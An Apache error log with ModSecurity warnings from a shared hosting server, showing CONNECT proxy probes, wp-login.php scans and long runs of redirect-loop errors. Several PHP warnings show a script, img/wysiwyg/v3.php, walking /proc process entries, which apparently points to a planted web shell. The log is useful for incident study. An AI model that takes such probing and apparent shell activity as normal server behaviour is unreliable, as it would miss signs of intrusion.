[Mon May 11 14:16:58.839822 2026] [security2:error] [pid 1320398:tid 1320407] [client 84.233.216.247:40469] ModSecurity: Warning. Match of "rx ^(?i:(?:[a-z]{3,10}\\\\s+(?:\\\\w{3,7}?://[\\\\w\\\\-\\\\./]*(?::\\\\d+)?)?/[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?|connect (?:\\\\d{1,3}\\\\.){3}\\\\d{1,3}\\\\.?(?::\\\\d+)?|options \\\\*)\\\\s+[\\\\w\\\\./]+|get /[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?)$" against "REQUEST_LINE" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "47"] [id "920100"] [rev "2"] [msg "Invalid HTTP Request Line"] [data "CONNECT www.uni-leipzig.de:443 HTTP/1.1"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "www.uni-leipzig.de"] [uri "/"] [unique_id "agHIuuJEyNRN152ArOR1-wAAAEc"]
[Mon May 11 14:16:58.845014 2026] [:error] [pid 1320398:tid 1320407] [client 84.233.216.247:40469] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:16:58.911428 2026] [security2:error] [pid 1319953:tid 1319957] [client 84.233.216.247:52991] ModSecurity: Warning. Match of "rx ^(?i:(?:[a-z]{3,10}\\\\s+(?:\\\\w{3,7}?://[\\\\w\\\\-\\\\./]*(?::\\\\d+)?)?/[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?|connect (?:\\\\d{1,3}\\\\.){3}\\\\d{1,3}\\\\.?(?::\\\\d+)?|options \\\\*)\\\\s+[\\\\w\\\\./]+|get /[^?#]*(?:\\\\?[^#\\\\s]*)?(?:#[\\\\S]*)?)$" against "REQUEST_LINE" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "47"] [id "920100"] [rev "2"] [msg "Invalid HTTP Request Line"] [data "CONNECT www.uni-leipzig.de:443 HTTP/1.1"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ"] [tag "CAPEC-272"] [hostname "www.uni-leipzig.de"] [uri "/"] [unique_id "agHIuuSQ-m-m0ukSShttrgAAAUI"]
[Mon May 11 14:16:58.914346 2026] [:error] [pid 1319953:tid 1319957] [client 84.233.216.247:52991] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.576591 2026] [:error] [pid 1319998:tid 1320012] [client 57.129.69.52:39046] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.581716 2026] [:error] [pid 1319885:tid 1319900] [client 57.129.81.224:45436] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.606709 2026] [:error] [pid 1320398:tid 1320418] [client 57.129.139.60:45788] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.635866 2026] [:error] [pid 1319953:tid 1319960] [client 57.129.81.227:43604] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.678592 2026] [:error] [pid 1319886:tid 1319909] [client 57.129.139.88:58484] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.700728 2026] [:error] [pid 1319885:tid 1319907] [client 57.129.81.227:43610] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.718085 2026] [:error] [pid 1320398:tid 1320421] [client 141.94.78.40:37732] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.749773 2026] [:error] [pid 1319998:tid 1320017] [client 141.95.54.59:34912] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.805960 2026] [:error] [pid 1320674:tid 1320708] [client 57.129.81.224:45444] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.828248 2026] [:error] [pid 1319953:tid 1319978] [client 51.75.21.177:50714] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.934957 2026] [:error] [pid 1319885:tid 1319891] [client 51.91.250.17:45586] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.952540 2026] [:error] [pid 1319998:tid 1320024] [client 57.129.139.60:45796] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:39.998547 2026] [:error] [pid 1320674:tid 1320710] [client 141.94.76.134:48276] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:40.032283 2026] [:error] [pid 1319953:tid 1319973] [client 57.129.135.175:58212] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:40.051280 2026] [:error] [pid 1319886:tid 1319906] [client 151.80.133.130:42778] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:40.196118 2026] [:error] [pid 1319998:tid 1320013] [client 51.75.18.6:36818] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:40.333045 2026] [:error] [pid 1320398:tid 1320411] [client 51.91.254.244:35028] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:44.867689 2026] [:error] [pid 1319998:tid 1320021] [client 51.195.252.59:37080] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 14:17:49.735961 2026] [security2:error] [pid 1319885:tid 1319915] [client 123.207.65.62:39032] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.nearoo.fr"] [uri "/"] [unique_id "agHI7VchVQ3tCn0m9OpDpQAAAQ8"]
[Mon May 11 14:18:08.653576 2026] [security2:error] [pid 1319886:tid 1319928] [client 43.156.127.60:48220] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pweil.com"] [uri "/"] [unique_id "agHJAKy-5-wpj6Sx56aEAAAAABI"]
[Mon May 11 14:19:51.310848 2026] [:error] [pid 1319885:tid 1319938] [client 74.235.96.117:50960] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 14:20:04.801582 2026] [ssl:error] [pid 1319998:tid 1320003] (EAI 2)Name or service not known: [client 208.84.100.18:44822] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:20:04.801786 2026] [ssl:error] [pid 1319998:tid 1320003] AH01941: stapling_renew_response: responder error
[Mon May 11 14:20:14.351822 2026] [security2:error] [pid 1319885:tid 1319889] [client 43.153.7.191:57058] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "bender.piregwan-genesis.com"] [uri "/"] [unique_id "agHJflchVQ3tCn0m9OpEQQAAAQE"], referer: http://bender.piregwan-genesis.com
PHP Warning:  filesize(): stat failed for /proc/595/task/595/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/595/task/595/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/595/task/595/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/595/task/595/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/595/task/595/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/595/task/595/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:20:42.861472 2026] [core:error] [pid 1320674:tid 1320705] [client 74.7.228.50:58356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:20:42.861762 2026] [core:error] [pid 1320674:tid 1320705] [client 74.7.228.50:58356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/898/task/898/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/898/task/898/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/898/task/898/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/898/task/898/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/898/task/898/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/898/task/898/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 14:21:08.212322 2026] [core:error] [pid 1319953:tid 1319965] [client 4.193.137.131:20471] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:08.212373 2026] [core:error] [pid 1319953:tid 1319965] [client 4.193.137.131:20471] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:08.723243 2026] [core:error] [pid 1319886:tid 1319908] [client 4.193.137.131:20419] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:08.723290 2026] [core:error] [pid 1319886:tid 1319908] [client 4.193.137.131:20419] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:11.296499 2026] [core:error] [pid 1319886:tid 1319899] [client 4.193.137.131:20459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:11.296537 2026] [core:error] [pid 1319886:tid 1319899] [client 4.193.137.131:20459] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:11.773023 2026] [core:error] [pid 1319953:tid 1319959] [client 4.193.137.131:20463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:11.773054 2026] [core:error] [pid 1319953:tid 1319959] [client 4.193.137.131:20463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:12.252693 2026] [core:error] [pid 1320398:tid 1320411] [client 4.193.137.131:20433] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:12.252736 2026] [core:error] [pid 1320398:tid 1320411] [client 4.193.137.131:20433] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:12.756758 2026] [core:error] [pid 1320398:tid 1320402] [client 4.193.137.131:20438] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:12.756786 2026] [core:error] [pid 1320398:tid 1320402] [client 4.193.137.131:20438] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:13.285931 2026] [core:error] [pid 1319886:tid 1319929] [client 4.193.137.131:20453] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:13.285965 2026] [core:error] [pid 1319886:tid 1319929] [client 4.193.137.131:20453] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:13.804541 2026] [core:error] [pid 1320398:tid 1320405] [client 4.193.137.131:20439] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:13.804661 2026] [core:error] [pid 1320398:tid 1320405] [client 4.193.137.131:20439] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:14.303869 2026] [core:error] [pid 1319953:tid 1319956] [client 4.193.137.131:20455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:14.303895 2026] [core:error] [pid 1319953:tid 1319956] [client 4.193.137.131:20455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:14.804539 2026] [core:error] [pid 1319885:tid 1319907] [client 4.193.137.131:20473] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:14.804577 2026] [core:error] [pid 1319885:tid 1319907] [client 4.193.137.131:20473] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:15.281886 2026] [core:error] [pid 1319953:tid 1319961] [client 4.193.137.131:20445] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:15.281917 2026] [core:error] [pid 1319953:tid 1319961] [client 4.193.137.131:20445] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:15.773647 2026] [core:error] [pid 1319886:tid 1319901] [client 4.193.137.131:20443] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:15.773780 2026] [core:error] [pid 1319886:tid 1319901] [client 4.193.137.131:20443] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:16.266611 2026] [core:error] [pid 1319885:tid 1319938] [client 4.193.137.131:19666] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:16.266637 2026] [core:error] [pid 1319885:tid 1319938] [client 4.193.137.131:19666] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:16.746413 2026] [core:error] [pid 1320674:tid 1320700] [client 4.193.137.131:20427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:16.746518 2026] [core:error] [pid 1320674:tid 1320700] [client 4.193.137.131:20427] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:17.226693 2026] [core:error] [pid 1319998:tid 1320012] [client 4.193.137.131:20432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:17.226811 2026] [core:error] [pid 1319998:tid 1320012] [client 4.193.137.131:20432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:17.736405 2026] [core:error] [pid 1320398:tid 1320415] [client 4.193.137.131:20444] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:17.736430 2026] [core:error] [pid 1320398:tid 1320415] [client 4.193.137.131:20444] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:18.247552 2026] [core:error] [pid 1319885:tid 1319932] [client 4.193.137.131:20461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:18.247666 2026] [core:error] [pid 1319885:tid 1319932] [client 4.193.137.131:20461] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:18.744786 2026] [core:error] [pid 1319953:tid 1319955] [client 4.193.137.131:20446] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:18.744938 2026] [core:error] [pid 1319953:tid 1319955] [client 4.193.137.131:20446] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:19.233417 2026] [core:error] [pid 1319885:tid 1319893] [client 4.193.137.131:19705] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:19.233460 2026] [core:error] [pid 1319885:tid 1319893] [client 4.193.137.131:19705] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:19.738511 2026] [core:error] [pid 1319953:tid 1319963] [client 4.193.137.131:24349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:19.738541 2026] [core:error] [pid 1319953:tid 1319963] [client 4.193.137.131:24349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:20.268600 2026] [core:error] [pid 1320674:tid 1320701] [client 4.193.137.131:20449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:20.268638 2026] [core:error] [pid 1320674:tid 1320701] [client 4.193.137.131:20449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:20.769272 2026] [core:error] [pid 1319885:tid 1319935] [client 4.193.137.131:20474] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:20.769311 2026] [core:error] [pid 1319885:tid 1319935] [client 4.193.137.131:20474] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:21.250132 2026] [core:error] [pid 1319886:tid 1319902] [client 4.193.137.131:20433] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:21.250185 2026] [core:error] [pid 1319886:tid 1319902] [client 4.193.137.131:20433] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:21.724924 2026] [core:error] [pid 1319885:tid 1319922] [client 4.193.137.131:20447] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:21.724956 2026] [core:error] [pid 1319885:tid 1319922] [client 4.193.137.131:20447] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:22.202965 2026] [core:error] [pid 1319953:tid 1319979] [client 4.193.137.131:19660] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:22.203000 2026] [core:error] [pid 1319953:tid 1319979] [client 4.193.137.131:19660] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:22.684949 2026] [core:error] [pid 1320674:tid 1320694] [client 4.193.137.131:20455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:22.685079 2026] [core:error] [pid 1320674:tid 1320694] [client 4.193.137.131:20455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:23.164409 2026] [core:error] [pid 1320398:tid 1320417] [client 4.193.137.131:20470] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:23.164448 2026] [core:error] [pid 1320398:tid 1320417] [client 4.193.137.131:20470] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:23.641436 2026] [core:error] [pid 1319886:tid 1319933] [client 4.193.137.131:20458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:23.641554 2026] [core:error] [pid 1319886:tid 1319933] [client 4.193.137.131:20458] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:24.148447 2026] [core:error] [pid 1320398:tid 1320403] [client 4.193.137.131:20460] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:24.148647 2026] [core:error] [pid 1320398:tid 1320403] [client 4.193.137.131:20460] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:24.625095 2026] [core:error] [pid 1319886:tid 1319905] [client 4.193.137.131:20438] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:24.625130 2026] [core:error] [pid 1319886:tid 1319905] [client 4.193.137.131:20438] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:25.103148 2026] [core:error] [pid 1319953:tid 1319967] [client 4.193.137.131:20462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:25.103208 2026] [core:error] [pid 1319953:tid 1319967] [client 4.193.137.131:20462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:25.606582 2026] [core:error] [pid 1319885:tid 1319903] [client 4.193.137.131:19561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:25.606719 2026] [core:error] [pid 1319885:tid 1319903] [client 4.193.137.131:19561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:26.083271 2026] [core:error] [pid 1320674:tid 1320695] [client 4.193.137.131:20472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:26.083295 2026] [core:error] [pid 1320674:tid 1320695] [client 4.193.137.131:20472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:26.566894 2026] [core:error] [pid 1319998:tid 1320003] [client 4.193.137.131:20432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:26.567003 2026] [core:error] [pid 1319998:tid 1320003] [client 4.193.137.131:20432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:27.043900 2026] [core:error] [pid 1320398:tid 1320419] [client 4.193.137.131:20420] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:27.044045 2026] [core:error] [pid 1320398:tid 1320419] [client 4.193.137.131:20420] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:27.521855 2026] [core:error] [pid 1320674:tid 1320693] [client 4.193.137.131:20426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:21:27.521897 2026] [core:error] [pid 1320674:tid 1320693] [client 4.193.137.131:20426] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
